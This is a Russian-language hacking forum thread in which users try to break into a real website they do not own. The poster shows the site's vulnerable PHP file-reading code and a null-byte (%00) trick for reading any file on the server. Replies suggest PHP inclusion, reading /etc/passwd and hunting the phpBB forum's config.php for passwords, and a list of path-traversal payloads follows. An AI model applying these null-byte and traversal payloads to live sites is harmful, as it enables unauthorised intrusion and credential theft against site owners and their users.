%00 в сайте
 

Прива всем!
Нашел сайт, который читает информацию из файлов так:
http:/*.*/index.php?page=now
<?
$f = fopen ("$page.txt","r+");
while (!feof($f))
{
$s = fgets($f,255);
echo $s;
}
?>

Используюя багу (нулл-байт [%00]) я могу читать любые файлы (http:/*.*/index.php?page=index.php%00 - выведет index.php на экран)
А что нить кроме чтения файлов с этого можно поиметь?

Чтение etc/shadow, passwd не предлагать!
{Hack detected. Contact the support.}

в принципе да...
попробуй провести php-инклудинг... и прочесть файлик /etc/passwd =)
посмотри есть ли на этом сайте форум какой-нить.. с форума можно будет прочесть всякие config.php =)) вобщем, ищи пароли))

Форум - phpbb какой-то!
Посмотрю конфиги! Гыыы

Где конфиг лежит нашел! Только открыть не могу!
Короче viktim.com
/home2/viktim/public_html/index.php - тут бага!
Форум forum.viktim.com/s/
а как к нему путь?
Пробовал так :/home2/viktim/public_html/forum/s/ - ничего не находит! Даже index.php

вообще-то ты неправильно пробуешь..
ты же должен искать файлы через свою багу.. т.е. писать не весь абс. путь, а путь, относительно бажного скрипта.. т.е.
index.php?page=../../s/config.php - например так..

да я уже и так и так пробовал! Толку никакого!
page=../../s/index.php
page=../s/index.php
page=s/index.php
page=forum/s/index.php
page=../forum/s/index.php
page=../../forum/s/index.php

ну если хочешь, можешь мне в ПМ кинуть ссылку, вместе посмотрим чё там есть -)